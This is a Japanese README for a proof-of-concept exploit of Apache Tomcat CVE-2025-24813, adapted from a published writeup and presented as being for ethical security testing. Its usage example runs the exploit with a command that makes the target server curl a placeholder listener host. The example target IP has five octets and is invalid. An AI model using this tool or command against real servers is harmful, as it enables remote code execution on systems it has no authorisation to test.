
CVE-2025-24813 の概念実証
CVE-2025-24813はApache Tomcatに影響を与えます。脆弱なバージョンで著しく誤った設定がされている場合、攻撃者は1回のGETと1回のPOSTでRCEを達成できます。
詳細はhere
これは、最近のwriteupからYiheng An、Jun Li、Qiang Liu、Haozhe Zhang、Qi Dengのスクリプトを改変したもので、コマンドを受け付け、すべてのysoserialガジェットペイロードを生成し、ターゲットに送信します。
倫理的なセキュリティテストの目的で共有されています。
使用例:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4はスクリプトの動作を示しており、ペイロードを生成してターゲットに送信し、右側のペインではインタラクトリスナーが呼び出されていることが確認できます。